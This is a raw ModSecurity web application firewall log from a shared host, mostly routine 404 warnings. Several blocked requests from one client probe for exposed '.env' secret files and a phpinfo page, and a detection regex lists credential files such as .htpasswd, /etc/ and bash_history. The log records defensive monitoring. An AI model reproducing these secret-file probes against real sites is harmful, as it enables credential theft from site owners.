[Tue May 26 13:04:11.363888 2026] [security2:error] [pid 470766:tid 470898] [client 195.178.110.199:43400] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8-jO_W1DqEcFHQ4FIAAAAAI"]
[Tue May 26 13:04:11.410774 2026] [security2:error] [pid 470766:tid 471004] [client 195.178.110.199:43348] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/Api/.env"] [unique_id "ahVM8-jO_W1DqEcFHQ4FKwAAAGw"]
[Tue May 26 13:04:11.505171 2026] [security2:error] [pid 470766:tid 470961] [client 195.178.110.199:43290] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/BACKEND/.env"] [unique_id "ahVM8-jO_W1DqEcFHQ4FLQAAAEE"]
[Tue May 26 13:04:11.506525 2026] [security2:error] [pid 470766:tid 470999] [client 195.178.110.199:43324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/BE/.env"] [unique_id "ahVM8-jO_W1DqEcFHQ4FLgAAAGc"]
[Tue May 26 13:04:11.531152 2026] [security2:error] [pid 470766:tid 470947] [client 195.178.110.199:43358] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/API/.env"] [unique_id "ahVM8-jO_W1DqEcFHQ4FMQAAADM"]
[Tue May 26 13:04:11.579881 2026] [security2:error] [pid 470766:tid 470795] [remote 112.196.0.228:34344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.0.196.112.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVM8-jO_W1DqEcFHQ4FLAAAARw"]
[Tue May 26 13:04:11.595921 2026] [security2:error] [pid 470766:tid 470903] [client 195.178.110.199:43268] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8-jO_W1DqEcFHQ4FMwAAAAc"]
[Tue May 26 13:04:11.599389 2026] [security2:error] [pid 470766:tid 470980] [client 195.178.110.199:43326] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8-jO_W1DqEcFHQ4FNAAAAFQ"]
[Tue May 26 13:04:11.605914 2026] [security2:error] [pid 470766:tid 470942] [client 195.178.110.199:43314] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8-jO_W1DqEcFHQ4FNgAAAC4"]
[Tue May 26 13:04:11.612393 2026] [security2:error] [pid 470766:tid 471015] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8-jO_W1DqEcFHQ4FOQAAAHc"]
[Tue May 26 13:04:11.659650 2026] [security2:error] [pid 470766:tid 470935] [client 195.178.110.199:43422] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8-jO_W1DqEcFHQ4FPAAAACc"]
[Tue May 26 13:04:11.702937 2026] [security2:error] [pid 470766:tid 471000] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8-jO_W1DqEcFHQ4FQgAAAGg"]
[Tue May 26 13:04:11.702961 2026] [security2:error] [pid 470766:tid 470928] [client 195.178.110.199:43300] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8-jO_W1DqEcFHQ4FPwAAACA"]
[Tue May 26 13:04:11.746454 2026] [security2:error] [pid 470766:tid 470902] [client 195.178.110.199:43268] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/Backend/.env"] [unique_id "ahVM8-jO_W1DqEcFHQ4FSQAAAAY"]
[Tue May 26 13:04:11.806818 2026] [security2:error] [pid 470766:tid 470922] [client 114.119.159.76:63269] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/portfolio/flat-cotton-rugs-3"] [unique_id "ahVM8-jO_W1DqEcFHQ4FUAAAABo"], referer: https://www.anujtradingco.com/portfolio/flat-cotton-rugs-3/
[Tue May 26 13:04:11.830965 2026] [security2:error] [pid 470766:tid 470986] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8-jO_W1DqEcFHQ4FTwAAAFo"]
[Tue May 26 13:04:11.833166 2026] [security2:error] [pid 470766:tid 471010] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8-jO_W1DqEcFHQ4FTQAAAHI"]
[Tue May 26 13:04:11.889665 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8-jO_W1DqEcFHQ4FVgAAABA"]
[Tue May 26 13:04:11.933617 2026] [security2:error] [pid 470766:tid 470993] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8-jO_W1DqEcFHQ4FXgAAAGE"]
[Tue May 26 13:04:11.951329 2026] [security2:error] [pid 470766:tid 471016] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8-jO_W1DqEcFHQ4FYgAAAHg"]
[Tue May 26 13:04:11.986531 2026] [security2:error] [pid 470766:tid 470909] [client 195.178.110.199:43400] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/BACK/.env"] [unique_id "ahVM8-jO_W1DqEcFHQ4FYwAAAA0"]
[Tue May 26 13:04:12.017151 2026] [security2:error] [pid 470766:tid 471014] [client 195.178.110.199:43358] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8-jO_W1DqEcFHQ4FZAAAAHY"]
[Tue May 26 13:04:12.050008 2026] [security2:error] [pid 470766:tid 471011] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4FZwAAAHM"]
[Tue May 26 13:04:12.068685 2026] [security2:error] [pid 470766:tid 470953] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4FagAAADk"]
[Tue May 26 13:04:12.101813 2026] [security2:error] [pid 470766:tid 470959] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4FcAAAAD8"]
[Tue May 26 13:04:12.125335 2026] [security2:error] [pid 470766:tid 470982] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4FdgAAAFY"]
[Tue May 26 13:04:12.151756 2026] [security2:error] [pid 470766:tid 470963] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM8-jO_W1DqEcFHQ4FSAAAAEM"]
[Tue May 26 13:04:12.191087 2026] [security2:error] [pid 470766:tid 470980] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4FegAAAFQ"]
[Tue May 26 13:04:12.193990 2026] [security2:error] [pid 470766:tid 470917] [client 4.201.75.230:5282] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/flower.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4FgQAAABU"]
[Tue May 26 13:04:12.201888 2026] [security2:error] [pid 470766:tid 470910] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4FfQAAAA4"]
[Tue May 26 13:04:12.220606 2026] [security2:error] [pid 470766:tid 470935] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4FgAAAACc"]
[Tue May 26 13:04:12.248433 2026] [security2:error] [pid 470766:tid 470977] [client 195.178.110.199:43348] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/Be/.env"] [unique_id "ahVM9OjO_W1DqEcFHQ4FiAAAAFE"]
[Tue May 26 13:04:12.251709 2026] [security2:error] [pid 470766:tid 470925] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4FhAAAAB0"]
[Tue May 26 13:04:12.256689 2026] [security2:error] [pid 470766:tid 470928] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4FhwAAACA"]
[Tue May 26 13:04:12.288801 2026] [security2:error] [pid 470766:tid 470807] [remote 74.7.241.58:55812] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVM9OjO_W1DqEcFHQ4FjgAAIyg"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-admin/network
[Tue May 26 13:04:12.351928 2026] [security2:error] [pid 470766:tid 470944] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4FlwAAADA"]
[Tue May 26 13:04:12.369685 2026] [security2:error] [pid 470766:tid 470943] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4FmgAAAC8"]
[Tue May 26 13:04:12.414064 2026] [security2:error] [pid 470766:tid 470983] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4FoAAAAFc"]
[Tue May 26 13:04:12.421504 2026] [security2:error] [pid 470766:tid 470940] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4FngAAACw"]
[Tue May 26 13:04:12.466390 2026] [security2:error] [pid 470766:tid 470954] [client 195.178.110.199:43290] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4FpAAAADo"]
[Tue May 26 13:04:12.501111 2026] [security2:error] [pid 470766:tid 470923] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4FqgAAABs"]
[Tue May 26 13:04:12.514023 2026] [security2:error] [pid 470766:tid 470956] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4FrQAAADw"]
[Tue May 26 13:04:12.516802 2026] [security2:error] [pid 470766:tid 470976] [client 195.178.110.199:43300] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4FrgAAAFA"]
[Tue May 26 13:04:12.588120 2026] [security2:error] [pid 470766:tid 470999] [client 195.178.110.199:43332] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4FsQAAAGc"]
[Tue May 26 13:04:12.589107 2026] [security2:error] [pid 470766:tid 470969] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4FsgAAAEk"]
[Tue May 26 13:04:12.613905 2026] [security2:error] [pid 470766:tid 470978] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4FuAAAAFI"]
[Tue May 26 13:04:12.649691 2026] [security2:error] [pid 470766:tid 470963] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4FvgAAAEM"]
[Tue May 26 13:04:12.649951 2026] [security2:error] [pid 470766:tid 470982] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4FvAAAAFY"]
[Tue May 26 13:04:12.655504 2026] [security2:error] [pid 470766:tid 470980] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4FwQAAAFQ"]
[Tue May 26 13:04:12.666444 2026] [security2:error] [pid 470766:tid 471002] [client 195.178.110.199:43374] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/admin-app/.env"] [unique_id "ahVM9OjO_W1DqEcFHQ4FyAAAAGo"]
[Tue May 26 13:04:12.680288 2026] [security2:error] [pid 470766:tid 470933] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4FxwAAACU"]
[Tue May 26 13:04:12.782531 2026] [security2:error] [pid 470766:tid 470994] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4FywAAAGI"]
[Tue May 26 13:04:12.792800 2026] [security2:error] [pid 470766:tid 470955] [client 195.178.110.199:43268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4FzAAAADs"]
[Tue May 26 13:04:12.859856 2026] [security2:error] [pid 470766:tid 470938] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4F1QAAACo"]
[Tue May 26 13:04:12.867399 2026] [security2:error] [pid 470766:tid 470921] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4F2AAAABk"]
[Tue May 26 13:04:12.970018 2026] [security2:error] [pid 470766:tid 471020] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4F3AAAAHw"]
[Tue May 26 13:04:12.972080 2026] [security2:error] [pid 470766:tid 470905] [client 195.178.110.199:43424] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4F3QAAAAk"]
[Tue May 26 13:04:12.986468 2026] [security2:error] [pid 470766:tid 470985] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4F4QAAAFk"]
[Tue May 26 13:04:13.001177 2026] [security2:error] [pid 470766:tid 471020] [client 195.178.110.199:43324] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4F5gAAAHw"]
[Tue May 26 13:04:13.002485 2026] [security2:error] [pid 470766:tid 470960] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9OjO_W1DqEcFHQ4F5wAAAEA"]
[Tue May 26 13:04:13.041491 2026] [security2:error] [pid 470766:tid 471005] [client 195.178.110.199:43254] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4F7AAAAG0"]
[Tue May 26 13:04:13.042026 2026] [security2:error] [pid 470766:tid 470954] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4F7gAAADo"]
[Tue May 26 13:04:13.062199 2026] [security2:error] [pid 470766:tid 471011] [client 195.178.110.199:43348] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM9ejO_W1DqEcFHQ4F7wAAAHM"]
